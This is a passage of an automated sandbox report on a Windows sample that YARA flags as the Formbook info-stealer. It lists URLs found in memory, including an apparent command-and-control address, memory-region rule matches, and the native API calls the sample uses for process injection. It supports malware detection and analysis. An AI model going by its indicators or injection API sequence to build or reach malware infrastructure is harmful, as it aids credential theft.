                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033F
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: mcbuilder.exe, 00000008.00000003.2580416916.0000000008245000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                  Source: mcbuilder.exe, 00000008.00000002.3493562644.00000000044A6000.00000004.10000000.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3493242754.0000000002EE6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bosonserver.net/x10g/?bPD=AtIpZIbrclbIO3wVVorP/
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                  E-Banking Fraud

                  Source: Yara match File source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  Source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_0042BEE3 NtClose,3_2_0042BEE3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942B60 NtClose,LdrInitializeThunk,3_2_01942B60
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01942DF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01942C70
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_019435C0 NtCreateMutant,LdrInitializeThunk,3_2_019435C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01944340 NtSetContextThread,3_2_01944340
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01944650 NtSuspendThread,3_2_01944650
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942B80 NtQueryInformationFile,3_2_01942B80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942BA0 NtEnumerateValueKey,3_2_01942BA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942BF0 NtAllocateVirtualMemory,3_2_01942BF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942BE0 NtQueryValueKey,3_2_01942BE0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942AB0 NtWaitForSingleObject,3_2_01942AB0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942AD0 NtReadFile,3_2_01942AD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942AF0 NtWriteFile,3_2_01942AF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942DB0 NtEnumerateKey,3_2_01942DB0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942DD0 NtDelayExecution,3_2_01942DD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942D10 NtMapViewOfSection,3_2_01942D10
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942D00 NtSetInformationFile,3_2_01942D00
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942D30 NtUnmapViewOfSection,3_2_01942D30
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942CA0 NtQueryInformationToken,3_2_01942CA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942CC0 NtQueryVirtualMemory,3_2_01942CC0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942CF0 NtOpenProcess,3_2_01942CF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942C00 NtQueryInformationProcess,3_2_01942C00
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942C60 NtCreateKey,3_2_01942C60
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942F90 NtProtectVirtualMemory,3_2_01942F90
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942FB0 NtResumeThread,3_2_01942FB0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942FA0 NtQuerySection,3_2_01942FA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942FE0 NtCreateFile,3_2_01942FE0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942F30 NtCreateSection,3_2_01942F30
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942F60 NtCreateProcessEx,3_2_01942F60
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942E80 NtReadVirtualMemory,3_2_01942E80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942EA0 NtAdjustPrivilegesToken,3_2_01942EA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942EE0 NtQueueApcThread,3_2_01942EE0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01942E30 NtWriteVirtualMemory,3_2_01942E30
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01943090 NtSetValueKey,3_2_01943090
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01943010 NtOpenDirectoryObject,3_2_01943010
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_019439B0 NtGetContextThread,3_2_019439B0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01943D10 NtOpenProcessToken,3_2_01943D10
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe Code function: 3_2_01943D70 NtOpenThread,3_2_01943D70
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D4340 NtSetContextThread,LdrInitializeThunk,8_2_038D4340
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D4650 NtSuspendThread,LdrInitializeThunk,8_2_038D4650
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_038D2BA0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_038D2BE0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_038D2BF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2B60 NtClose,LdrInitializeThunk,8_2_038D2B60
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2AD0 NtReadFile,LdrInitializeThunk,8_2_038D2AD0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2AF0 NtWriteFile,LdrInitializeThunk,8_2_038D2AF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2FB0 NtResumeThread,LdrInitializeThunk,8_2_038D2FB0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2FE0 NtCreateFile,LdrInitializeThunk,8_2_038D2FE0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2F30 NtCreateSection,LdrInitializeThunk,8_2_038D2F30
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_038D2E80
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_038D2EE0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2DD0 NtDelayExecution,LdrInitializeThunk,8_2_038D2DD0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_038D2DF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_038D2D10
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_038D2D30
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_038D2CA0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2C60 NtCreateKey,LdrInitializeThunk,8_2_038D2C60
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_038D2C70
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D35C0 NtCreateMutant,LdrInitializeThunk,8_2_038D35C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D39B0 NtGetContextThread,LdrInitializeThunk,8_2_038D39B0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2B80 NtQueryInformationFile,8_2_038D2B80
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2AB0 NtWaitForSingleObject,8_2_038D2AB0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2F90 NtProtectVirtualMemory,8_2_038D2F90
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2FA0 NtQuerySection,8_2_038D2FA0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2F60 NtCreateProcessEx,8_2_038D2F60
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2EA0 NtAdjustPrivilegesToken,8_2_038D2EA0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2E30 NtWriteVirtualMemory,8_2_038D2E30
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2DB0 NtEnumerateKey,8_2_038D2DB0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2D00 NtSetInformationFile,8_2_038D2D00
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2CC0 NtQueryVirtualMemory,8_2_038D2CC0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2CF0 NtOpenProcess,8_2_038D2CF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D2C00 NtQueryInformationProcess,8_2_038D2C00
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D3090 NtSetValueKey,8_2_038D3090
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D3010 NtOpenDirectoryObject,8_2_038D3010
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D3D10 NtOpenProcessToken,8_2_038D3D10
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_038D3D70 NtOpenThread,8_2_038D3D70
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_030B8BE0 NtDeleteFile,8_2_030B8BE0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_030B8AF0 NtReadFile,8_2_030B8AF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_030B8980 NtCreateFile,8_2_030B8980
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_030B8DF0 NtAllocateVirtualMemory,8_2_030B8DF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exe Code function: 8_2_030B8C80 NtClose,8_2_030B8C80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019DB16B3_2_019DB16B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194516C3_2_0194516C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FF1723_2_018FF172
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019170C03_2_019170C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BF0CC3_2_019BF0CC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C70E93_2_019C70E9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CF0E03_2_019CF0E0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0195739A3_2_0195739A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C132D3_2_019C132D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FD34C3_2_018FD34C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019152A03_2_019152A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192B2C03_2_0192B2C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192D2F03_2_0192D2F0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B12ED3_2_019B12ED
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AD5B03_2_019AD5B0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D95C33_2_019D95C3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C75713_2_019C7571
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CF43F3_2_019CF43F
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019014603_2_01901460
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CF7B03_2_019CF7B0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C16CC3_2_019C16CC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019556303_2_01955630
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A59103_2_019A5910
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019199503_2_01919950
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192B9503_2_0192B950
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019138E03_2_019138E0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197D8003_2_0197D800
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192FB803_2_0192FB80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01985BF03_2_01985BF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194DBF93_2_0194DBF9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CFB763_2_019CFB76
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01955AA03_2_01955AA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019ADAAC3_2_019ADAAC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B1AA33_2_019B1AA3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BDAC63_2_019BDAC6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CFA493_2_019CFA49
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C7A463_2_019C7A46
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01983A6C3_2_01983A6C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192FDC03_2_0192FDC0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C1D5A3_2_019C1D5A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01913D403_2_01913D40
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C7D733_2_019C7D73
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CFCF23_2_019CFCF2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01989C323_2_01989C32
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01911F923_2_01911F92
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CFFB13_2_019CFFB1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018D3FD53_2_018D3FD5
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018D3FD23_2_018D3FD2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CFF093_2_019CFF09
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01919EB03_2_01919EB0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039603E68_2_039603E6
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038AE3F08_2_038AE3F0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395A3528_2_0395A352
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039202C08_2_039202C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039402748_2_03940274
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039541A28_2_039541A2
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039601AA8_2_039601AA
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039581CC8_2_039581CC
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038901008_2_03890100
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0393A1188_2_0393A118
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039281588_2_03928158
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039320008_2_03932000
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0389C7C08_2_0389C7C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038C47508_2_038C4750
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A07708_2_038A0770
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BC6E08_2_038BC6E0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039605918_2_03960591
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A05358_2_038A0535
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0394E4F68_2_0394E4F6
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039444208_2_03944420
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039524468_2_03952446
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03956BD78_2_03956BD7
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395AB408_2_0395AB40
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0389EA808_2_0389EA80
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A29A08_2_038A29A0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0396A9A68_2_0396A9A6
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038B69628_2_038B6962
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038868B88_2_038868B8
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038CE8F08_2_038CE8F0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A28408_2_038A2840
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038AA8408_2_038AA840
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0391EFA08_2_0391EFA0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03892FC88_2_03892FC8
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03942F308_2_03942F30
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038E2F288_2_038E2F28
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038C0F308_2_038C0F30
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03914F408_2_03914F40
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395CE938_2_0395CE93
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038B2E908_2_038B2E90
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395EEDB8_2_0395EEDB
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395EE268_2_0395EE26
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A0E598_2_038A0E59
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038B8DBF8_2_038B8DBF
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0389ADE08_2_0389ADE0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038AAD008_2_038AAD00
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0393CD1F8_2_0393CD1F
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03940CB58_2_03940CB5
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03890CF28_2_03890CF2
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A0C008_2_038A0C00
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038E739A8_2_038E739A
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395132D8_2_0395132D
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0388D34C8_2_0388D34C
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A52A08_2_038A52A0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BB2C08_2_038BB2C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039412ED8_2_039412ED
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BD2F08_2_038BD2F0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038AB1B08_2_038AB1B0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D516C8_2_038D516C
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0388F1728_2_0388F172
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0396B16B8_2_0396B16B
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A70C08_2_038A70C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0394F0CC8_2_0394F0CC
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395F0E08_2_0395F0E0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039570E98_2_039570E9
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395F7B08_2_0395F7B0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039516CC8_2_039516CC
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038E56308_2_038E5630
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0393D5B08_2_0393D5B0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039695C38_2_039695C3
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039575718_2_03957571
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395F43F8_2_0395F43F
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038914608_2_03891460
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BFB808_2_038BFB80
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03915BF08_2_03915BF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038DDBF98_2_038DDBF9
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395FB768_2_0395FB76
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038E5AA08_2_038E5AA0
